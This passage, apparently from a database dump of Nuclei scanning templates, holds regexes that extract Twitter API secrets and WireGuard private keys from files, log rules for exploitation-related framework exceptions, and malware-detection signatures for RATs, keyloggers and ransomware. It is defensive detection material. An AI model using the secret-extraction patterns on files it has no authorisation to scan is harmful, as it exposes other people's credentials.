twitter,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\btwitter.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{18,25})\\b\n# digest: 4a0a00473045022030cb9bb226fc38ff17accc2fbe89603cae16c35050ec725ad20ce14d5fbc5ad2022100860577843f28d261d7fbf35ef59577e5fd0e84a50eb370cfbd714f1039338c19:922c64590222798bb761d5b6d8e72950", "hash": "1b0c0dfd77659475cc6b2dce502eb2b5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d65" }, "name": "twitter-secret.yaml", "content": "id: twitter-secret\n\ninfo:\n name: Twitter Secret Key\n author: DhiyaneshDK,gaurang,daffainfo\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml\n - https://developer.twitter.com/en/docs/authentication/overview\n metadata:\n verified: true\n tags: twitter,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)twitter.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{35,44})\\b\n# digest: 4a0a00473045022100ae8d7dcc6d380f9b0ba6d16ca558e7af6254078b3f1a0a2230f8ddc28f47267102206348551061cffebd4da2b42ec393373ef0987eeeb4382f0e517c38c836fb46cf:922c64590222798bb761d5b6d8e72950", "hash": "8aaac58f6ca5fefbde44156e3d3b13ce", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d66" }, "name": "wireguard-preshared.yaml", "content": "id: wireguard-preshared\n\ninfo:\n name: WireGuard Preshared Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml\n - https://www.wireguard.com/quickstart/\n - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html\n - 
https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd\n metadata:\n verified: true\n tags: wireguard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - PresharedKey\\s*=\\s*([A-Za-z0-9+/]{43}=)\n# digest: 4a0a00473045022055b7809c89c44f01db811de03d659329878fabbb6006f65a5cfc4c231e72b5ce022100916852a09714e7cf50f5e239c48dba2b243d889df28c54c7671cb3b0ec8dc9e5:922c64590222798bb761d5b6d8e72950", "hash": "f7c4cd0b00a362669d518b104e71cc78", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d67" }, "name": "wireguard-private.yaml", "content": "id: wireguard-private\n\ninfo:\n name: WireGuard Private Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml\n - https://www.wireguard.com/quickstart/\n - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html\n - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd\n metadata:\n verified: true\n tags: wireguard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - PrivateKey\\s*=\\s*([A-Za-z0-9+/]{43}=)\n# digest: 4a0a004730450221008bd7fd7c9c74eb3c6d2f1d5e4c8cc9c0fcc230534b094814ee0ca7dff2f7f9800220688ed7ae288880609a373ea69defa1d5ed93ca3fcb312e5c4ea2acea46b2e27c:922c64590222798bb761d5b6d8e72950", "hash": "714d36bd1a4aa5902fd2d8fd92b48b3d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d68" }, "name": "django-framework-exceptions.yaml", "content": "id: django-framework-exceptions\n\ninfo:\n name: Django Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts\n reference:\n - https://docs.djangoproject.com/en/1.11/ref/exceptions/\n - 
https://docs.djangoproject.com/en/1.11/topics/logging/#django-security\n tags: file,logs,django\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'SuspiciousOperation'\n - 'DisallowedHost'\n - 'DisallowedModelAdminLookup'\n - 'DisallowedModelAdminToField'\n - 'DisallowedRedirect'\n - 'InvalidSessionKey'\n - 'RequestDataTooBig'\n - 'SuspiciousFileOperation'\n - 'SuspiciousMultipartForm'\n - 'SuspiciousSession'\n - 'TooManyFieldsSent'\n - 'PermissionDenied'\n\n# digest: 4a0a0047304502205f33a921687fc710f1271b09e50c6f9fbca2ca07919f6239a8972da5e80e4ece022100bfc39ac2cdb85b270eb0d92321b0809a68df57f8956a06dcaf6ac4a1e4b87e2f:922c64590222798bb761d5b6d8e72950\n", "hash": "c8f6fb7c96606d34cea2d1c616f6f59a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d69" }, "name": "python-app-sql-exceptions.yaml", "content": "id: python-app-sql-exceptions\n\ninfo:\n name: Python App - SQL Exception\n author: geeknik\n severity: medium\n description: A generic SQL exception was discovered in Python according to PEP 249.\n reference:\n - https://www.python.org/dev\n - https://peps.python.org/pep-0249/\n tags: file,logs,python,sql\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'DataError'\n - 'IntegrityError'\n - 'ProgrammingError'\n - 'OperationalError'\n\n# digest: 4a0a00473045022079a46e42dc0321daff4fa00b021a299f5f746c2faed50fcba78acb826f35b261022100e777c196aed8119194c365ea967487c6795b47902f0d29873ade5a16fc1125cd:922c64590222798bb761d5b6d8e72950\n", "hash": "6c48420820965e8b59045e97f4f557f4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6a" }, "name": "ruby-on-rails-framework-exceptions.yaml", "content": "id: ruby-on-rails-framework-exceptions\n\ninfo:\n name: Ruby on Rails Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Ruby on Rails exceptions that 
could indicate exploitation attempts\n reference:\n - http://edgeguides.rubyonrails.org/security.html\n - http://guides.rubyonrails.org/action_controller_overview.html\n - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception\n - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb\n tags: file,logs,ruby,rails\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'ActionController\\:\\:InvalidAuthenticityToken'\n - 'ActionController::InvalidCrossOriginRequest'\n - 'ActionController::MethodNotAllowed'\n - 'ActionController::BadRequest'\n - 'ActionController::ParameterMissing'\n\n# digest: 4b0a00483046022100a1bd834e4286e12eca1f7399ab94cbe5050b0f8952abf7b30c664b22697e4df2022100a86690ed53bb1a4ac2537909bd5efb6ba95efb245ba9b746044f7bf4c958b2a5:922c64590222798bb761d5b6d8e72950\n", "hash": "ae916e5caaf43ab2478ef58623a521cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6b" }, "name": "spring-framework-exceptions.yaml", "content": "id: spring-framework-exceptions\n\ninfo:\n name: Spring Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts\n reference:\n - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html\n tags: file,logs,spring\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'AccessDeniedException'\n - 'CsrfException'\n - 'InvalidCsrfTokenException'\n - 'MissingCsrfTokenException'\n - 'CookieTheftException'\n - 'InvalidCookieException'\n - 'RequestRejectedException'\n\n# digest: 4a0a0047304502206ba4ce83107c5c02e084ca1a2743a346e3e41dbc727e3470f6519aa3e24fc9950221009c39b68664e85289134c1c58072a5086f3878c01ec27503b82984401a1d9ac0c:922c64590222798bb761d5b6d8e72950\n", "hash": 
"eb79b43c7cc8ca64f11f7cc2e8676b6b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6c" }, "name": "suspicious-sql-error-messages.yaml", "content": "id: suspicious-sql-error-messages\n\ninfo:\n name: SQL - Error Messages\n author: geeknik\n severity: critical\n description: SQL error messages that indicate probing for an injection attack were detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cwe-id: CWE-89\n tags: file,logs,sql,error\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: oracle\n part: body\n regex:\n - 'quoted string not properly terminated'\n\n - type: regex\n name: mysql\n part: body\n regex:\n - 'You have an error in your SQL syntax'\n\n - type: regex\n name: sql_server\n part: body\n regex:\n - 'Unclosed quotation mark'\n\n - type: regex\n name: sqlite\n part: body\n regex:\n - 'near \\\"\\*\\\"\\: syntax error'\n - 'SELECTs to the left and right of UNION do not have the same number of result columns'\n\n# digest: 490a0046304402201d5d530c0efe89b2780c5a407266a640c4f3ddc7ccf1c39f27855bb9675b456e022031ffc06367293118a8f9c8e3ce0c116256961abbea5b0761b4954f7070fa6349:922c64590222798bb761d5b6d8e72950\n", "hash": "d7f2f6b6b5cdca5f244f2079465d019e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6d" }, "name": "aar-malware.yaml", "content": "id: aar-malware\n\ninfo:\n name: AAR Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Hashtable\"\n - \"get_IsDisposed\"\n - \"TripleDES\"\n - \"testmemory.FRMMain.resources\"\n - \"$this.Icon\"\n - \"{11111-22222-20001-00001}\"\n - \"@@@@@\"\n condition: and\n\n# digest: 
4b0a00483046022100c3a9a57d91e28a49a5e9b6b0d1cb748be88c636110c9eb9482a51fde9f35266d022100a6f13bde1916d01e42c6dca9544ffdb9fe475e393657f82d753701898621b765:922c64590222798bb761d5b6d8e72950\n", "hash": "76353ea41525459d33ae19d239dc9732", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6e" }, "name": "adzok-malware.yaml", "content": "id: adzok-malware\n\ninfo:\n name: Adzok Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"Uninstall.jarPK\"\n - \"resources/icono.pngPK\"\n condition: and\n\n 
- type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"Uninstall.jarPK\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"config.xmlPK\"\n - \"key.classPK\"\n - \"svd$1.classPK\"\n - \"svd$2.classPK\"\n - \"Mensaje.classPK\"\n - \"inic$ShutdownHook.class\"\n - \"resources/icono.pngPK\"\n condition: and\n\n# digest: 4a0a00473045022078baa991694a29ddb0910faad83bbe2d56a67739ab974b6a43eab7e494ae29b302210090fb44202dfbca4ef591b7d55b2c10ddcff8a47737a46de9491c838a7263be77:922c64590222798bb761d5b6d8e72950\n", "hash": "072faa4cec83d8be6e171351b138eab6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6f" }, "name": "alfa-malware.yaml", "content": "id: alfa-malware\n\ninfo:\n name: Alfa Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"8B0C9781E1FFFF000081F919040000740F81F9\"\n - \"220400007407423BD07CE2EB02\"\n condition: and\n\n# digest: 4a0a0047304502206fd1a4e1b8a904da814aa19c10249a96a98fa29233f922bab161e3b93d413a00022100a147f5f3a192423bda7f022ad0bb3dd91d1a8d321d9a6687c9da0ca35ce98476:922c64590222798bb761d5b6d8e72950\n", "hash": "13f26d26bb2d4c9f49cbbaa9a3769841", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d70" }, "name": "alienspy-malware.yaml", "content": "id: alienspy-malware\n\ninfo:\n name: AlienSpy Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF/MANIFEST.MF\"\n - \"ePK\"\n - \"kPK\"\n - \"config.ini\"\n - \"password.ini\"\n - \"stub/stub.dll\"\n - \"c.dat\"\n 
condition: and\n\n# digest: 4b0a0048304602210099bae7391b6cf2278da97789c2cb44af6ea6a4983b92016e59a3456fa593335f022100cbc010d1b5dff13672cb5c07314431e7f74d24f8bc0c2035185d3c08269a3be3:922c64590222798bb761d5b6d8e72950\n", "hash": "38fab9b3febd62f4672ed0038fc66016", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d71" }, "name": "alina-malware.yaml", "content": "id: alina-malware\n\ninfo:\n name: Alina Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Alina v1.0'\n - 'POST'\n - '1[0-2])[0-9]'\n condition: and\n\n# digest: 4b0a00483046022100a267b4decff9664b60695730319caed7c613138a358e3697b3e1b0566b20872c022100cf3ac7fafc2bed1b5d599729fcde42a0ac732f400b015a260b1a493fe8e8c193:922c64590222798bb761d5b6d8e72950\n", "hash": "3dde04a0864236637d14967306529af4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d72" }, "name": "alpha-malware.yaml", "content": "id: alpha-malware\n\ninfo:\n name: Alpha Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"520065006100640020004D0065002000280048006F00770020004400650063\"\n\n# digest: 4a0a004730450221009b5e9aa41a25cb5d9482c691f43bb6f1711b5a6907c684034f43192929520cb20220085710f5e83b940ae1e8defff1687753b6525289356cf579f3108a1a10620b52:922c64590222798bb761d5b6d8e72950\n", "hash": "abca9dd433717ea5b0b7ff53bc149c60", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d73" }, "name": "andromeda-malware.yaml", "content": "id: andromeda-malware\n\ninfo:\n name: Andromeda Malware - Detect\n author: daffainfo\n severity: info\n reference: 
https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'hsk\\\\ehs\\\\dihviceh\\\\serhlsethntrohntcohurrehem\\\\chsyst'\n\n - type: binary\n binary:\n - \"1C1C1D03494746\"\n\n# digest: 490a0046304402201778cf53991884f7b29706930aec0f8acfce69528e080663a436bdba0b42546a0220636a9eee01a609195564a9f19c89721357a20d1b3460d1beeff7b33b961c74b0:922c64590222798bb761d5b6d8e72950\n", "hash": "2874359d4a79d5172128794c449ae685", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d74" }, "name": "ap0calypse-malware.yaml", "content": "id: ap0calypse-malware\n\ninfo:\n name: Ap0calypse Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Ap0calypse\"\n - \"Sifre\"\n - \"MsgGoster\"\n - \"Baslik\"\n - \"Dosyalars\"\n - \"Injecsiyon\"\n condition: and\n\n# digest: 4a0a004730450221009a4fe2a01a81f0ce6902dff99fd80899a03564015ef45e6a0cf97470115f32b3022027b355be70bb66fb654b7ea8d1cfc34de9d61102a4d5a66f8218b764b4d94897:922c64590222798bb761d5b6d8e72950\n", "hash": "b7ab48258011a23c10d3250f3d9e3cdf", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d75" }, "name": "arcom-malware.yaml", "content": "id: arcom-malware\n\ninfo:\n name: Arcom Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"CVu3388fnek3W(3ij3fkp0930di\"\n - \"ZINGAWI2\"\n - \"clWebLightGoldenrodYellow\"\n - \"Ancestor for '%s' not found\"\n - \"Control-C hit\"\n condition: and\n\n - type: binary\n 
binary:\n - \"A3242521\"\n\n# digest: 4b0a00483046022100c94af5a498c4235c4290fd509d830c181e05b2915d979c951c297aacd1c24f71022100902af9cda3098593dc1e6f28001eecccd32330b65e6f6329d35bf7e48fb757ea:922c64590222798bb761d5b6d8e72950\n", "hash": "72a97aa0003697b907ec8b73ed96ddb3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d76" }, "name": "arkei-malware.yaml", "content": "id: arkei-malware\n\ninfo:\n name: Arkei Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Arkei'\n - '/server/gate'\n - '/server/grubConfig'\n - '\\\\files\\\\'\n - 'SQLite'\n condition: and\n\n# digest: 4a0a004730450220521d19ffdc72c12b2e9464f1214ef06c4d2b714414ed036d576636a2bfcb8455022100a6fcba94907d58d6ebf858c11440ccc232b30a950ddb1a3bed2eacebeac1e8e8:922c64590222798bb761d5b6d8e72950\n", "hash": "1c489659d857690aadeb5d8c1cc46292", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d77" }, "name": "backoff-malware.yaml", "content": "id: backoff-malware\n\ninfo:\n name: Backoff Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s'\n - '%s @ %s'\n - 'Upload KeyLogs'\n condition: and\n\n# digest: 490a00463044022054816145454972b2358433c84a6671c0caf54ba3365d6f959c77815a082223ce02206908e7c060293d4bfcb9349f78aa7e296b348d407d8098600fa1e839b273350a:922c64590222798bb761d5b6d8e72950\n", "hash": "599e8004247bb4ad65adc055bd5c50b4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d78" }, "name": "bandook-malware.yaml", "content": "id: bandook-malware\n\ninfo:\n name: Bandook Malware - 
Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"aaaaaa1|\"\n - \"aaaaaa2|\"\n - \"aaaaaa3|\"\n - \"aaaaaa4|\"\n - \"aaaaaa5|\"\n - \"%s%d.exe\"\n - \"astalavista\"\n - \"givemecache\"\n - \"%s\\\\system32\\\\drivers\\\\blogs\\\\*\"\n - \"bndk13me\"\n condition: and\n\n# digest: 490a00463044022007979ba459fa852d0b1fd07c059ee0adb0247b99212b122b9f3b6e1e4048588d02205a59508d1df975e27c8120cd265e4c11e535631c16b5be4ca71b9595c4326cc2:922c64590222798bb761d5b6d8e72950\n", "hash": "4d77ff0ba6f7d620764dbdd89ab508c6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d79" }, "name": "basicrat-malware.yaml", "content": "id: basicrat-malware\n\ninfo:\n name: BasicRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara\n tags: malware,file,basicrat\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"HKCU Run registry key applied\"\n - \"HKCU Run registry key failed\"\n - \"Error, platform unsupported.\"\n - \"Persistence successful,\"\n - \"Persistence unsuccessful,\"\n condition: and\n\n# digest: 4a0a00473045022100a3b0720f39037b89cbbc1a8a155cbb1d582662a4fec913439bff2417eab3e603022017b43756edf65a2ecf81c6949c67a80b1ba8de85367ce236c003de0f6f8cfbae:922c64590222798bb761d5b6d8e72950\n", "hash": "02761de420f49eb49f15014fc2c3b4fd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7a" }, "name": "blacknix-malware.yaml", "content": "id: blacknix-malware\n\ninfo:\n name: BlackNix Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n 
matchers:\n - type: word\n part: raw\n words:\n - \"SETTINGS\"\n - \"Mark Adler\"\n - \"Random-Number-Here\"\n - \"RemoteShell\"\n - \"SystemInfo\"\n condition: and\n\n# digest: 4b0a00483046022100d79b2bf6b9813e24be723eb40b017c34bbd91cae5b58e92d923f51257f56d1ed022100e978029b16a82c219c6186d41c114204721f08530e6a919c27b8a37475e29145:922c64590222798bb761d5b6d8e72950\n", "hash": "d93dfe8ac870467e61a3de6dab7aa680", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7b" }, "name": "blackworm-malware.yaml", "content": "id: blackworm-malware\n\ninfo:\n name: Blackworm Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'm_ComputerObjectProvider'\n - 'MyWebServices'\n - 'get_ExecutablePath'\n - 'get_WebServices'\n - 'My.WebServices'\n - 'My.User'\n - 'm_UserObjectProvider'\n - 'DelegateCallback'\n - 'TargetMethod'\n - '000004b0'\n - 'Microsoft Corporation'\n condition: and\n\n# digest: 4a0a004730450220321a9ba25d7190220dfe7a801636bec8dd82300a4da2c00042576a880fd29287022100db2c2eaa880379c8391de61e30836de4b1ac496040c28f59da587259b3c7f089:922c64590222798bb761d5b6d8e72950\n", "hash": "61adb0d6a278dab19b3d8c095156da00", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7c" }, "name": "bluebanana-malware.yaml", "content": "id: bluebanana-malware\n\ninfo:\n name: BlueBanana Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF\"\n - \"config.txt\"\n - \"a/a/a/a/f.class\"\n - \"a/a/a/a/l.class\"\n - \"a/a/a/b/q.class\"\n - \"a/a/a/b/v.class\"\n condition: and\n\n# digest: 
4a0a00473045022100fff584f3f17159c1748a0e0d4d2b0ee120b206c7f959c4710c02215ae2aca93202206700d0cf20118e36c252a73fbf0f9d0f2bab421663c347de5e5764537c44d855:922c64590222798bb761d5b6d8e72950\n", "hash": "0c47cf7e41604504fea0f088566c4ba5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7d" }, "name": "bozok-malware.yaml", "content": "id: bozok-malware\n\ninfo:\n name: Bozok Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"getVer\"\n - \"StartVNC\"\n - \"SendCamList\"\n - \"untPlugin\"\n - \"gethostbyname\"\n condition: and\n case-insensitive: true\n\n# digest: 4b0a00483046022100f2c9bd8b2ea4e20d78f05da06c61f06d8e04b10d3278739034fdfda246502739022100cb09d1b5cf17a4e82f48f572ec3da680ce8f891a923d5735eca5b8becaca8fca:922c64590222798bb761d5b6d8e72950\n", "hash": "8ffd40b5f2420c1cbbe0497dbe85dd90", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7e" }, "name": "bublik-malware.yaml", "content": "id: bublik-malware\n\ninfo:\n name: Bublik Malware Detector\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - '636F6E736F6C6173'\n - '636C556E00696E666F2E696E69'\n condition: and\n\n# digest: 4a0a00473045022020ba9de3e2cb03c66cf8a47387eeece28ff22583c7f326a703492241b6828b39022100b1114876a5721a8c80ad0902b80cd0e21cb60edc9cdb30f1bdf4f4c6d87a6753:922c64590222798bb761d5b6d8e72950\n", "hash": "38bd7e14c3cd7f7ac6362c091d1813d3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d7f" }, "name": "cap-hookexkeylogger-malware.yaml", "content": "id: cap-hookexkeylogger-malware\n\ninfo:\n name: CAP HookExKeylogger Malware - Detect\n 
author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"SetWindowsHookEx\"\n - \"WH_KEYBOARD_LL\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: raw\n words:\n - \"SetWindowsHookEx\"\n - \"WH_KEYBOARD\"\n condition: and\n case-insensitive: true\n\n - type: word\n part: raw\n words:\n - \"WH_KEYBOARD\"\n - \"WH_KEYBOARD_LL\"\n condition: and\n case-insensitive: true\n\n# digest: 490a0046304402200f26aeb3ca9df9f4045a64a911f4165e3d2cce3ecd67e137f3b2933a1ad58fdf02200afec8f59a9b9944c13e0480ccca71629e367d03dbe950f02440a6cf9f4a52cf:922c64590222798bb761d5b6d8e72950\n", "hash": "e14de9ed8d2b2b2b0a5b73138cda1f37", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d80" }, "name": "cerber-malware.yaml", "content": "id: cerber-malware\n\ninfo:\n name: Cerber Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara\n tags: malware,file,cerber\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"38oDr5.vbs\"\n - \"8ivq.dll\"\n - \"jmsctls_progress32\"\n condition: and\n\n# digest: 4a0a00473045022100875a7c6d4f7468c6d1b91a1eff6e5d17ddc8253fadf0856b37b4f8ced121f6fe0220184ef1cbe47ccffd9fd29895751c24db364027da486bbf48c8ddd86ce84e89e1:922c64590222798bb761d5b6d8e72950\n", "hash": "fe52408862b742b7bac639c70b570bb5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d81" }, "name": "cerberus-malware.yaml", "content": "id: cerberus-malware\n\ninfo:\n name: Cerberus Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar\n tags: malware,file\nfile:\n - 
